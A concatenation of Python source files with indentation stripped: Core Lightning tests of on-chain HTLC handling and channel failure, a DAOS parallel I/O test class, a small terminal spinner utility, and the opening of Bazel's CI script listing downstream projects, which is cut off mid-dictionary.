with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE'):
n.rpc.waitsendpay(h, TIMEOUT)
# At depth 100 it's all done (we didn't bother waiting for mid+1's
# spends, so that might still be going)
bitcoind.generate_block(97)
nodes[mid].daemon.wait_for_logs(['onchaind complete, forgetting peer'])
# No other channels should have failed.
for i in range(len(nodes) - 1):
if i != mid:
assert only_one(nodes[i].rpc.listpeers(nodes[i + 1].info['id'])['peers'])['connected']
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1 for dev_ignore_htlcs")
@unittest.skipIf(SLOW_MACHINE and VALGRIND, "slow test")
def test_onchain_multihtlc_their_unilateral(node_factory, bitcoind):
"""Node pushes a channel onchain with multiple HTLCs with same payment_hash """
h, nodes = setup_multihtlc_test(node_factory, bitcoind)
mid = len(nodes) // 2
for i in range(len(nodes) - 1):
assert only_one(nodes[i].rpc.listpeers(nodes[i + 1].info['id'])['peers'])['connected']
# Now midnode+1 goes onchain with midnode channel.
nodes[mid + 1].rpc.dev_fail(nodes[mid].info['id'])
nodes[mid + 1].wait_for_channel_onchain(nodes[mid].info['id'])
bitcoind.generate_block(1)
nodes[mid].daemon.wait_for_log(' to ONCHAIN')
nodes[mid + 1].daemon.wait_for_log(' to ONCHAIN')
# Now, restart and manually reconnect end nodes (so they don't ignore HTLCs)
# In fact, they'll fail them with WIRE_TEMPORARY_NODE_FAILURE.
nodes[0].restart()
nodes[-1].restart()
# We disabled auto-reconnect so we'd detect breakage, so manually reconnect.
nodes[0].rpc.connect(nodes[1].info['id'], 'localhost', nodes[1].port)
nodes[-1].rpc.connect(nodes[-2].info['id'], 'localhost', nodes[-2].port)
# Wait for HTLCs to stabilize.
nodes[0].daemon.wait_for_logs(['peer_out WIRE_UPDATE_FAIL_HTLC'] * 3)
nodes[0].daemon.wait_for_log('peer_out WIRE_COMMITMENT_SIGNED')
nodes[0].daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
nodes[-1].daemon.wait_for_logs(['peer_out WIRE_UPDATE_FAIL_HTLC'] * 3)
nodes[-1].daemon.wait_for_log('peer_out WIRE_COMMITMENT_SIGNED')
nodes[-1].daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
# At depth 5, midnode+1 will spend its own to-self output.
bitcoind.generate_block(4)
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET')
# The three outgoing HTLCs time out at depth 21, 21 and 22 blocks.
bitcoind.generate_block(16)
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
bitcoind.generate_block(1)
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
# At depth 3 we consider them all settled.
bitcoind.generate_block(3)
# Now, those nodes should have correctly failed the HTLCs
for n in nodes[:mid - 1]:
with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE'):
n.rpc.waitsendpay(h, TIMEOUT)
# Other timeouts are at depths 27,27,28 blocks.
bitcoind.generate_block(2)
nodes[mid].daemon.wait_for_logs(['Ignoring output.*: THEIR_UNILATERAL/THEIR_HTLC'] * 2)
for _ in range(2):
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
bitcoind.generate_block(1)
nodes[mid].daemon.wait_for_log('Ignoring output.*: THEIR_UNILATERAL/THEIR_HTLC')
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
# At depth 3 we consider them all settled.
bitcoind.generate_block(3)
for n in nodes[mid + 1:]:
with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE'):
n.rpc.waitsendpay(h, TIMEOUT)
# At depth 5, mid+1 can spend HTLC_TIMEOUT_TX output.
bitcoind.generate_block(1)
for _ in range(2):
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_HTLC_TIMEOUT_TX/DELAYED_OUTPUT_TO_US')
bitcoind.generate_block(1)
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_HTLC_TIMEOUT_TX/DELAYED_OUTPUT_TO_US')
# At depth 100 they're all done.
bitcoind.generate_block(100)
nodes[mid].daemon.wait_for_logs(['onchaind complete, forgetting peer'])
nodes[mid + 1].daemon.wait_for_logs(['onchaind complete, forgetting peer'])
# No other channels should have failed.
for i in range(len(nodes) - 1):
if i != mid:
assert only_one(nodes[i].rpc.listpeers(nodes[i + 1].info['id'])['peers'])['connected']
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_permfail_htlc_in(node_factory, bitcoind, executor):
# Test case where we fail with unsettled incoming HTLC.
disconnects = ['-WIRE_UPDATE_FULFILL_HTLC', 'permfail']
# Feerates identical so we don't get gratuitous commit to update them
l1 = node_factory.get_node(options={'dev-no-reconnect': None}, feerates=(7500, 7500, 7500))
l2 = node_factory.get_node(disconnect=disconnects)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, 10**6)
# This will fail at l2's end.
t = executor.submit(l1.pay, l2, 200000000)
l2.daemon.wait_for_log('dev_disconnect permfail')
l2.wait_for_channel_onchain(l1.info['id'])
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Their unilateral tx, old commit point')
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log('Propose handling OUR_UNILATERAL/THEIR_HTLC by THEIR_HTLC_TIMEOUT_TO_THEM \\(IGNORING\\) after 6 blocks')
l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TO_US (.*) after 6 blocks')
# l2 then gets preimage, uses it instead of ignoring
l2.wait_for_onchaind_broadcast('OUR_HTLC_SUCCESS_TX',
'OUR_UNILATERAL/THEIR_HTLC')
bitcoind.generate_block(1)
# OK, l1 sees l2 fulfill htlc.
l1.daemon.wait_for_log('THEIR_UNILATERAL/OUR_HTLC gave us preimage')
l2.daemon.wait_for_log('Propose handling OUR_HTLC_SUCCESS_TX/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks')
bitcoind.generate_block(5)
l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_HTLC_SUCCESS_TX/DELAYED_OUTPUT_TO_US')
t.cancel()
# Now, 100 blocks it should be done.
bitcoind.generate_block(95)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(5)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_permfail_htlc_out(node_factory, bitcoind, executor):
# Test case where we fail with unsettled outgoing HTLC.
disconnects = ['+WIRE_REVOKE_AND_ACK', 'permfail']
l1 = node_factory.get_node(options={'dev-no-reconnect': None})
# Feerates identical so we don't get gratuitous commit to update them
l2 = node_factory.get_node(disconnect=disconnects, feerates=(7500, 7500, 7500))
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l2.daemon.wait_for_log('openingd-{} chan #1: Handed peer, entering loop'.format(l1.info['id']))
l2.fund_channel(l1, 10**6)
# This will fail at l2's end.
t = executor.submit(l2.pay, l1, 200000000)
l2.daemon.wait_for_log('dev_disconnect permfail')
l2.wait_for_channel_onchain(l1.info['id'])
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Their unilateral tx, old commit point')
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_logs([
'Propose handling OUR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TX \\(.*\\) after 6 blocks',
'Propose handling OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks'
])
l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/THEIR_HTLC by THEIR_HTLC_TIMEOUT_TO_THEM \\(IGNORING\\) after 6 blocks')
# l1 then gets preimage, uses it instead of ignoring
l1.wait_for_onchaind_broadcast('THEIR_HTLC_FULFILL_TO_US',
'THEIR_UNILATERAL/THEIR_HTLC')
# l2 sees l1 fulfill tx.
bitcoind.generate_block(1)
l2.daemon.wait_for_log('OUR_UNILATERAL/OUR_HTLC gave us preimage')
t.cancel()
# l2 can send OUR_DELAYED_RETURN_TO_WALLET after 3 more blocks.
bitcoind.generate_block(3)
l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# Now, 100 blocks they should be done.
bitcoind.generate_block(95)
sync_blockheight(bitcoind, [l1, l2])
assert not l1.daemon.is_in_log('onchaind complete, forgetting peer')
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
sync_blockheight(bitcoind, [l2])
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(3)
sync_blockheight(bitcoind, [l2])
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
wait_for(lambda: l2.rpc.listpeers()['peers'] == [])
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_permfail(node_factory, bitcoind):
l1, l2 = node_factory.line_graph(2)
# The funding change should be confirmed and our only output
assert [o['status'] for o in l1.rpc.listfunds()['outputs']] == ['confirmed']
l1.pay(l2, 200000000)
# Make sure l2 has received sig with 0 htlcs!
l2.daemon.wait_for_log('Received commit_sig with 1 htlc sigs')
l2.daemon.wait_for_log('Received commit_sig with 0 htlc sigs')
# Make sure l1 has final revocation.
l1.daemon.wait_for_log('Sending commit_sig with 1 htlc sigs')
l1.daemon.wait_for_log('Sending commit_sig with 0 htlc sigs')
l1.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
# We fail l2, so l1 will reconnect to it.
l2.rpc.dev_fail(l1.info['id'])
l2.daemon.wait_for_log('Failing due to dev-fail command')
l2.wait_for_channel_onchain(l1.info['id'])
assert l1.bitcoin.rpc.getmempoolinfo()['size'] == 1
# Now grab the close transaction
closetxid = only_one(l1.bitcoin.rpc.getrawmempool(False))
# l2 will send out tx (l1 considers it a transient error)
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Their unilateral tx, old commit point')
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log('Propose handling OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET (.*) after 5 blocks')
wait_for(lambda: only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status']
== ['ONCHAIN:Tracking their unilateral close',
'ONCHAIN:All outputs resolved: waiting 99 more blocks before forgetting channel'])
def check_billboard():
billboard = only_one(l2.rpc.listpeers(l1.info['id'])['peers'][0]['channels'])['status']
return (
len(billboard) == 2
and billboard[0] == 'ONCHAIN:Tracking our own unilateral close'
and re.fullmatch(r'ONCHAIN:.* outputs unresolved: in 4 blocks will spend DELAYED_OUTPUT_TO_US \(.*:0\) using OUR_DELAYED_RETURN_TO_WALLET', billboard[1])
)
wait_for(check_billboard)
# Now, mine 4 blocks so it sends out the spending tx.
bitcoind.generate_block(4)
# onchaind notes to-local payment immediately.
assert (closetxid, "confirmed") in set([(o['txid'], o['status']) for o in l1.rpc.listfunds()['outputs']])
# Restart, should still be confirmed (fails: unwinding blocks erases
# the confirmation, and we don't re-make it).
l1.restart()
wait_for(lambda: (closetxid, "confirmed") in set([(o['txid'], o['status']) for o in l1.rpc.listfunds()['outputs']]))
# It should send the to-wallet tx.
l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# 100 after l1 sees tx, it should be done.
bitcoind.generate_block(95)
wait_for(lambda: l1.rpc.listpeers()['peers'] == [])
wait_for(lambda: only_one(l2.rpc.listpeers(l1.info['id'])['peers'][0]['channels'])['status'] == [
'ONCHAIN:Tracking our own unilateral close',
'ONCHAIN:All outputs resolved: waiting 5 more blocks before forgetting channel'
])
# Now, 100 blocks l2 should be done.
bitcoind.generate_block(5)
wait_for(lambda: l2.rpc.listpeers()['peers'] == [])
# Only l1 has a direct output since all of l2's outputs are respent (it
# failed). Also the output should now be listed as confirmed since we
# generated some more blocks.
assert (closetxid, "confirmed") in set([(o['txid'], o['status']) for o in l1.rpc.listfunds()['outputs']])
addr = l1.bitcoin.rpc.getnewaddress()
l1.rpc.withdraw(addr, "all")
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_shutdown(node_factory):
# Fail, in that it will exit before cleanup.
l1 = node_factory.get_node(may_fail=True)
if not VALGRIND:
leaks = l1.rpc.dev_memleak()['leaks']
if len(leaks):
raise Exception("Node {} has memory leaks: {}"
.format(l1.daemon.lightning_dir, leaks))
l1.rpc.stop()
|
parallel_io.py
|
#!/usr/bin/python
"""
(C) Copyright 2020-2022 Intel Corporation.
SPDX-License-Identifier: BSD-2-Clause-Patent
"""
import threading
import subprocess #nosec
import time
from getpass import getuser
import general_utils
from ClusterShell.NodeSet import NodeSet
from exception_utils import CommandFailure
from fio_test_base import FioBase
from ior_test_base import IorTestBase
# pylint: disable=too-many-ancestors
class ParallelIo(FioBase, IorTestBase):
"""Base Parallel IO test class.
:avocado: recursive
"""
def __init__(self, *args, **kwargs):
"""Initialize a ParallelIo object."""
super().__init__(*args, **kwargs)
self.dfuse = None
self.cont_count = None
self.pool_count = None
self.statvfs_info_initial = None
self.statvfs_before_cont_destroy = None
self.statvfs_after_cont_destroy = None
self.pool = []
self.container = []
def create_pool(self):
"""Create a TestPool object to use with ior."""
self.pool.append(self.get_pool(connect=False))
def stat_bfree(self, path):
"""Get stat bfree.
Args:
path (str): path to get free block size of.
Returns:
int: value of stat free blocks
"""
cmd = ["ssh", "{}@{}".format(getuser(), self.hostlist_clients[0]),
"stat -c%a -f {}".format(path)]
try:
result = subprocess.check_output(cmd)
except subprocess.CalledProcessError as err:
self.fail("Get free block size method failed with: {}".format(err))
return int(result)
def statvfs_pool(self, path):
"""Obtain the free space for the pool using statvfs.
Args:
path (str): path for which free space needs to be obtained for.
Returns:
list: list of free space info for each pool supplied in pool_obj.
"""
statvfs_list = []
for _, pool in enumerate(self.pool):
dfuse_pool_dir = str(path + "/" + pool.uuid)
statvfs_info = self.stat_bfree(dfuse_pool_dir)
statvfs_list.append(statvfs_info)
self.log.info("Statvfs List Output: %s", statvfs_list)
return statvfs_list
def verify_aggregation(self, reduced_space, count):
"""Verify aggregation.
Verify if expected space is returned for each pool after containers
were destroyed. If not, wait for 60 secs and check again. Wait 4 times,
otherwise exit the test with a failure.
Args:
reduced_space (int): expected space to be returned
count (int): aggregation index
"""
counter = 1
while (self.statvfs_after_cont_destroy[count] <
self.statvfs_before_cont_destroy[count] + reduced_space):
# try to wait for 4 x 60 secs for aggregation to be completed
# or else exit the test with a failure.
if counter > 4:
self.log.info("Free space before io: %s",
self.statvfs_info_initial)
self.log.info("Free space after io: %s",
self.statvfs_before_cont_destroy)
self.log.info("Free space at test termination: %s",
self.statvfs_after_cont_destroy)
self.fail("Aggregation did not complete as expected")
time.sleep(60)
self.statvfs_after_cont_destroy = self.statvfs_pool(
self.dfuse.mount_dir.value)
counter += 1
def test_parallelio(self):
"""Jira ID: DAOS-3775.
Test Description:
Purpose of this test is to mount dfuse and verify multiple
containers using fio.
Use cases:
Mount dfuse using pool uuid.
Create multiple containers under that dfuse mount point.
Check those containers are accessible from that mount point.
Perform io to those containers using FIO
Delete one of the containers
Check if dfuse is still running. If not, fail the test and exit.
Otherwise, try accessing the deleted container.
This should fail.
Check dfuse again.
:avocado: tags=all,full_regression
:avocado: tags=hw,medium,ib2
:avocado: tags=daosio,tx,dfuse
:avocado: tags=parallelio
"""
# get test params for cont and pool count
self.cont_count = self.params.get("cont_count", '/run/container/*')
threads = []
# Create a pool and start dfuse.
self.create_pool()
self.start_dfuse(self.hostlist_clients, self.pool[0], None)
# create multiple containers
self.add_container_qty(self.cont_count, self.pool[0])
# check if all the created containers can be accessed and perform
# io on each container using fio in parallel
for _, cont in enumerate(self.container):
dfuse_cont_dir = self.dfuse.mount_dir.value + "/" + cont.uuid
cmd = "ls -a {}".format(dfuse_cont_dir)
try:
# execute bash cmds
ret_code = general_utils.pcmd(
self.hostlist_clients, cmd, timeout=30)
if 0 not in ret_code:
error_hosts = NodeSet(
",".join(
[str(node_set) for code, node_set in
list(ret_code.items()) if code != 0]))
raise CommandFailure(
"Error running '{}' on the following "
"hosts: {}".format(cmd, error_hosts))
# report error if any command fails
except CommandFailure as error:
self.log.error("ParallelIo Test Failed: %s",
str(error))
self.fail("Test was expected to pass but "
"it failed.\n")
# run fio on all containers
thread = threading.Thread(target=self.execute_fio, args=(
self.dfuse.mount_dir.value + "/" + cont.uuid, False))
threads.append(thread)
thread.start()
# wait for all fio jobs to be finished
for job in threads:
job.join()
# destroy first container
container_to_destroy = self.container[0].uuid
self.container[0].destroy(1)
# check dfuse if it is running fine
self.dfuse.check_running()
# try accessing destroyed container, it should fail
try:
self.execute_fio(
self.dfuse.mount_dir.value + "/" + container_to_destroy, False)
self.fail(
"Fio was able to access destroyed container: {}".format(
self.container[0].uuid))
except CommandFailure as error:
self.log.info("This run is expected to fail")
# check dfuse is still running after attempting to access deleted
# container.
self.dfuse.check_running()
def test_multipool_parallelio(self):
"""Jira ID: DAOS-3775.
Test Description:
Purpose of this test is to verify aggregation across multiple
pools and containers.
Use cases:
Create 10 pools
Create 10 containers under each pool.
Record statvfs free space for each pool.
Perform parallel io to each pool without deleting the file
after write.
Record free space using statvfs after write.
Delete half of the containers from each pool.
Calculate the expected amount of data to be deleted when
containers are destroyed.
Record free space after container destroy.
Loop until either the all space is returned back after aggregation
completion or exit the loop after trying for 240 secs of wait and
fail the test.
:avocado: tags=all,full_regression
:avocado: tags=hw,medium,ib2
:avocado: tags=daosio,dfuse
:avocado: tags=multipoolparallelio
"""
# test params
threads = []
pool_threads = []
cont_threads = []
self.pool_count = self.params.get("pool_count", '/run/pool/*')
self.cont_count = self.params.get("cont_count", '/run/container/*')
processes = self.params.get("np", '/run/ior/client_processes/*')
# Create pools in parallel.
for _ in range(self.pool_count):
pool_thread = threading.Thread(target=self.create_pool())
pool_threads.append(pool_thread)
pool_thread.start()
# wait for container create to finish
for pool_job in pool_threads:
pool_job.join()
# start dfuse.
self.start_dfuse(self.hostlist_clients, None, None)
# record free space using statvfs before any data is written.
self.statvfs_info_initial = self.statvfs_pool(
self.dfuse.mount_dir.value)
# Create 10 containers for each pool. Container create process cannot
# be parallelised as different container create could complete at
# different times and get appended in the self.container variable in
# unorderly manner, causing problems during the write process.
for _, pool in enumerate(self.pool):
self.add_container_qty(self.cont_count, pool)
# Try to access each dfuse mounted container using ls. Once it is
# accessed successfully, go ahead and perform io on that location
# using ior. This process of performing io is done in parallel for
# all containers using threads.
for pool_count, pool in enumerate(self.pool):
dfuse_pool_dir = str(self.dfuse.mount_dir.value + "/" + pool.uuid)
for counter in range(self.cont_count):
cont_num = (pool_count * self.cont_count) + counter
dfuse_cont_dir = str(dfuse_pool_dir + "/" +
self.container[cont_num].uuid)
cmd = "###ls -a {}".format(dfuse_cont_dir)
self.execute_cmd(cmd)
# run ior on all containers
test_file = dfuse_cont_dir + "/testfile"
self.ior_cmd.test_file.update(test_file)
self.ior_cmd.set_daos_params(
self.server_group, pool, self.container[cont_num].uuid)
thread = threading.Thread(
target=self.run_ior,
args=(self.get_ior_job_manager_command(), processes, None,
False))
threads.append(thread)
thread.start()
# wait for all ior jobs to be finished
for job in threads:
job.join()
# Record free space after io
self.statvfs_before_cont_destroy = self.statvfs_pool(
self.dfuse.mount_dir.value)
# Destroy half of the containers from each pool
pfinal = 0
for count in range(self.cont_count):
pinitial = pfinal
pfinal = pinitial + (self.cont_count // 2)
del self.container[pinitial:pfinal]
for cont in self.container:
cont_thread = threading.Thread(target=cont.destroy)
cont_threads.append(cont_thread)
cont_thread.start()
for destroy_job in cont_threads:
destroy_job.join()
# Record free space after container destroy.
self.statvfs_after_cont_destroy = self.statvfs_pool(
self.dfuse.mount_dir.value)
# Calculate the expected space to be returned after containers
# are destroyed.
reduced_space = (self.cont_count *
int(self.ior_cmd.block_size.value))/2
# Verify if expected space is returned for each pool after containers
# were destroyed. If not, wait for 60 secs and check again. Wait 4
# times, otherwise exit the test with a failure.
for count in range(self.pool_count):
thread = threading.Thread(
target=self.verify_aggregation,
args=(reduced_space, count))
threads.append(thread)
thread.start()
for job in threads:
job.join()
|
spinner.py
|
# From: https://stackoverflow.com/a/39504463
# License: Creative Commons Attribution-Share Alike
# Copyright: Victor Moyseenko
import sys
import time
import threading
class Spinner:
busy = False
delay = 0.1
@staticmethod
def spinning_cursor():
while 1:
for cursor in "|/-\\":
yield cursor
def __init__(self, delay=None):
self.spinner_generator = self.spinning_cursor()
if delay and float(delay):
self.delay = delay
def spinner_task(self):
while self.busy:
try:
if sys.stdout.isatty():
sys.stdout.write(next(self.spinner_generator))
sys.stdout.flush()
time.sleep(self.delay)
sys.stdout.write("\b")
sys.stdout.flush()
except Exception:
# we don't care what happens here
pass
def __enter__(self):
self.busy = True
threading.Thread(target=self.spinner_task).start()
def __exit__(self, exception, value, tb):
self.busy = False
time.sleep(self.delay)
if exception is not None:
return False
|
bazelci.py
|
#!/usr/bin/env python3
#
# Copyright 2018 The Bazel Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import base64
import codecs
import datetime
from glob import glob
import hashlib
import json
import multiprocessing
import os
import os.path
import random
import re
import requests
from shutil import copyfile
import shutil
import stat
import subprocess
import sys
import tempfile
import threading
import time
import urllib.error
import urllib.request
import uuid
import yaml
from urllib.request import url2pathname
from urllib.parse import urlparse
# Initialize the random number generator.
random.seed()
BUILDKITE_ORG = os.environ["BUILDKITE_ORGANIZATION_SLUG"]
THIS_IS_PRODUCTION = BUILDKITE_ORG == "bazel"
THIS_IS_TESTING = BUILDKITE_ORG == "bazel-testing"
THIS_IS_TRUSTED = BUILDKITE_ORG == "bazel-trusted"
THIS_IS_SPARTA = True
CLOUD_PROJECT = "bazel-public" if THIS_IS_TRUSTED else "bazel-untrusted"
GITHUB_BRANCH = {"bazel": "master", "bazel-trusted": "master", "bazel-testing": "testing"}[
BUILDKITE_ORG
]
SCRIPT_URL = "https://raw.githubusercontent.com/bazelbuild/continuous-integration/{}/buildkite/bazelci.py?{}".format(
GITHUB_BRANCH, int(time.time())
)
INCOMPATIBLE_FLAG_VERBOSE_FAILURES_URL = "https://raw.githubusercontent.com/bazelbuild/continuous-integration/{}/buildkite/incompatible_flag_verbose_failures.py?{}".format(
GITHUB_BRANCH, int(time.time())
)
AGGREGATE_INCOMPATIBLE_TEST_RESULT_URL = "https://raw.githubusercontent.com/bazelbuild/continuous-integration/{}/buildkite/aggregate_incompatible_flags_test_result.py?{}".format(
GITHUB_BRANCH, int(time.time())
)
EMERGENCY_FILE_URL = "https://raw.githubusercontent.com/bazelbuild/continuous-integration/{}/buildkite/emergency.yml?{}".format(
GITHUB_BRANCH, int(time.time())
)
FLAKY_TESTS_BUCKET = {
"bazel-testing": "gs://bazel-testing-buildkite-stats/flaky-tests-bep/",
"bazel-trusted": "gs://bazel-buildkite-stats/flaky-tests-bep/",
"bazel": "gs://bazel-buildkite-stats/flaky-tests-bep/",
}[BUILDKITE_ORG]
KZIPS_BUCKET = {
"bazel-testing": "gs://bazel-kzips-testing/",
"bazel-trusted": "gs://bazel-kzips/",
"bazel": "gs://bazel-kzips/",
}[BUILDKITE_ORG]
# Projects can opt out of receiving GitHub issues from --notify by adding `"do_not_notify": True` to their respective downstream entry.
DOWNSTREAM_PROJECTS_PRODUCTION = {
"Android Studio Plugin": {
"git_repository": "https://github.com/bazelbuild/intellij.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/intellij/master/.bazelci/android-studio.yml",
"pipeline_slug": "android-studio-plugin",
},
"Android Testing": {
"git_repository": "https://github.com/googlesamples/android-testing.git",
"http_config": "https://raw.githubusercontent.com/googlesamples/android-testing/master/bazelci/buildkite-pipeline.yml",
"pipeline_slug": "android-testing",
},
"Bazel": {
"git_repository": "https://github.com/bazelbuild/bazel.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/bazel/master/.bazelci/postsubmit.yml",
"pipeline_slug": "bazel-bazel",
},
"Bazel Bench": {
"git_repository": "https://github.com/bazelbuild/bazel-bench.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/bazel-bench/master/.bazelci/postsubmit.yml",
"pipeline_slug": "bazel-bench",
},
"Bazel Codelabs": {
"git_repository": "https://github.com/bazelbuild/codelabs.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/codelabs/master/.bazelci/presubmit.yml",
"pipeline_slug": "bazel-codelabs",
"disabled_reason": "https://github.com/bazelbuild/codelabs/issues/38",
},
"Bazel Examples": {
"git_repository": "https://github.com/bazelbuild/examples.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/examples/master/.bazelci/presubmit.yml",
"pipeline_slug": "bazel-bazel-examples",
},
"Bazel Federation": {
"git_repository": "https://github.com/bazelbuild/bazel-federation.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/bazel-federation/master/.bazelci/presubmit.yml",
"pipeline_slug": "bazel-federation",
"disabled_reason": "https://github.com/bazelbuild/bazel-federation/issues/126",
},
"Bazel Remote Cache": {
"git_repository": "https://github.com/buchgr/bazel-remote.git",
"http_config": "https://raw.githubusercontent.com/buchgr/bazel-remote/master/.bazelci/presubmit.yml",
"pipeline_slug": "bazel-remote-cache",
},
"Bazel integration testing": {
"git_repository": "https://github.com/bazelbuild/bazel-integration-testing.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/bazel-integration-testing/master/.bazelci/presubmit.yml",
"pipeline_slug": "bazel-integration-testing",
},
"Bazel skylib": {
"git_repository": "https://github.com/bazelbuild/bazel-skylib.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/bazel-skylib/main/.bazelci/presubmit.yml",
"pipeline_slug": "bazel-skylib",
"owned_by_bazel": True,
},
"Bazel toolchains": {
"git_repository": "https://github.com/bazelbuild/bazel-toolchains.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/bazel-toolchains/master/.bazelci/presubmit.yml",
"pipeline_slug": "bazel-toolchains",
},
"Bazel watcher": {
"git_repository": "https://github.com/bazelbuild/bazel-watcher.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/bazel-watcher/master/.bazelci/presubmit.yml",
"pipeline_slug": "bazel-watcher",
},
"Bazelisk": {
"git_repository": "https://github.com/bazelbuild/bazelisk.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/bazelisk/master/.bazelci/config.yml",
"pipeline_slug": "bazelisk",
},
"Buildfarm": {
"git_repository": "https://github.com/bazelbuild/bazel-buildfarm.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/bazel-buildfarm/main/.bazelci/presubmit.yml",
"pipeline_slug": "buildfarm-farmer",
},
"Buildtools": {
"git_repository": "https://github.com/bazelbuild/buildtools.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/buildtools/master/.bazelci/presubmit.yml",
"pipeline_slug": "buildtools",
},
"Cargo-Raze": {
"git_repository": "https://github.com/google/cargo-raze.git",
"http_config": "https://raw.githubusercontent.com/google/cargo-raze/master/.bazelci/presubmit.yml",
"pipeline_slug": "cargo-raze",
},
"CLion Plugin": {
"git_repository": "https://github.com/bazelbuild/intellij.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/intellij/master/.bazelci/clion.yml",
"pipeline_slug": "clion-plugin",
},
"Cartographer": {
"git_repository": "https://github.com/googlecartographer/cartographer.git",
"http_config": "https://raw.githubusercontent.com/googlecartographer/cartographer/master/.bazelci/presubmit.yml",
"pipeline_slug": "cartographer",
},
"Cloud Robotics Core": {
"git_repository": "https://github.com/googlecloudrobotics/core.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/continuous-integration/master/buildkite/pipelines/cloud-robotics-postsubmit.yml",
"pipeline_slug": "cloud-robotics-core",
},
"Envoy": {
"git_repository": "https://github.com/envoyproxy/envoy.git",
"http_config": "https://raw.githubusercontent.com/envoyproxy/envoy/master/.bazelci/presubmit.yml",
"pipeline_slug": "envoy",
},
"FlatBuffers": {
"git_repository": "https://github.com/google/flatbuffers.git",
"http_config": "https://raw.githubusercontent.com/google/flatbuffers/master/.bazelci/presubmit.yml",
"pipeline_slug": "flatbuffers",
"disabled_reason": "https://github.com/bazelbuild/bazel/issues/13811",
},
"Flogger": {
"git_repository": "https://github.com/google/flogger.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/continuous-integration/master/buildkite/pipelines/flogger.yml",
"pipeline_slug": "flogger",
},
